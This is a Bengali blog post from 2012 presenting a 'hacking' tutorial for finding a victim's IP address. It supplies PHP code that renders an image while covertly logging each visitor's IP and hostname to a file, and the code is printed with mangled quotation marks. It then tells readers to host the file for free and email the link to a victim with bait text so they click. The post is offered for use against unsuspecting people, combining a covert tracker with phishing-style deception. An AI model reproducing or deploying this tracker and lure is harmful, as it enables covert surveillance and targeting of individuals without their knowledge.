আসসালামু আলাইকুম

মঙ্গলবার, ৩ এপ্রিল, ২০১২

এবার যে কারও এবার আইপি সনাক্ত করুন

আসসালামু আলাইকুম, সবাইকে আবারও স্বাগতম আজকের টিউনে। কেমন আছেন সবাই? আশা করি মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আপনাদের জন্য নিয়ে এলাম একটি মজার জিনিস। কি জিনিস? হা হা হা হা। বুঝে ফেলেছেন! ভাল, খুবই ভাল। আপনাদের অনেক বুদ্ধি হয়েছে। আমি জানি না যে, টিউনার পেজ থেকে আপনারা কেমন সুবিধা পাচ্ছেন। মানে টিউনারপেজ থেকে আপনারা আপনাদের প্রয়োজনীয় সব কিছু পাচ্ছেন কিনা? আশা করি সমস্যা হওয়ার কথা না। যাক, আজকের টিউনে ফিরে আসি…


বিভিন্ন ক্ষেত্রে আমাদের অন্যের IP এড্রেস প্রয়োজন হয়। বিশেষ করে যখন আপনি সাধারণ হ্যাকিং করবেন, তখন আপনাকে আপনার ভিকটিমের IP address জানতেই হবে। না হলে আপনি তার কিছুই করতে পারবেন না। এখন আপনি ভাবছেন যে, কীভাবে আমি IP address বের করবো? কোন সমস্যাই নেই। “অনির্বাচিত টিউনার” আছে, তাই আশা করি এখনকার মতো সমস্যার সমাধান হবে। হা হা হা হা হাহা। এখন আমরা একটি .php পেজ তৈরি করব। আপনি প্রথমে নিচের কোডগুলো কপি করে নোটপ্যাডে পেষ্ট করুন। এবার File –> Save as এ ক্লিক করুন। এবার File Name এ লিখুন tunerpage.php এবার সেভ করুন। তবে অবশ্যই আপনি যে নামই দেন না কেন, নামের শেষে .php অবশ্যই দিবেন।

এবার কোডটি নিনঃ


$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$img_number = imagecreate(400,95);

$backcolor = imagecolorallocate($img_number,10,102,153);

$textcolor = imagecolorallocate($img_number,255,255,255);



imagefill($img_number,0,0,$backcolor);

$number0 = ” This is Your IP/Proxy”;

$number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]“;

$number2 = ” Host/Proxy: $hostname”;

$number4 = ” _________________________________”;



Imagestring($img_number,10,5,5,$number0,$textcolor);

Imagestring($img_number,10,5,25,$number1,$textcolor);

Imagestring($img_number,10,5,45,$number2,$textcolor);

Imagestring($img_number,10,5,50,$number4,$textcolor);

Imagestring($img_number,10,8,50,$number4,$textcolor);

Imagestring($img_number,10,5,10,$number4,$textcolor);

Imagestring($img_number,10,8,10,$number4,$textcolor);



header(“Content-type: image/png”);

imagepng($img_number);

$file=fopen(“Name-here-to-protect-the-File.txt”,”a”);

$file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host: $hostname – ‘\n’ “;

fwrite($file, $file2);

fclose($file);

?>

এবার আপনার .php ফাইলটি যে কোন ফ্রি ফাই্ল হোষ্টিং সাই্টে আপলোড করুন। যেমন- www.my3gb.com বা www.ripway.com.
এবার আপনার লিংকটি আপনার ভিকটিমের মেইলে পাঠান। তবে সাথে অবশ্যই এমন কিছু কথা লিখবেন, যাতে সে লোভে পড়ে যায়।
এবার যদি আপনার ভিকটিম কোন রকমে লিংকে ক্লিক করে, তাহলে তার আইপি আপনার হোষ্টিং সাইটে সেভ হয়ে যাবে।
এবার আপনার কাজে আইপিটি ব্যবহার করুন।
সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ…………………..

0 comments:

একটি মন্তব্য পোস্ট করুন

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More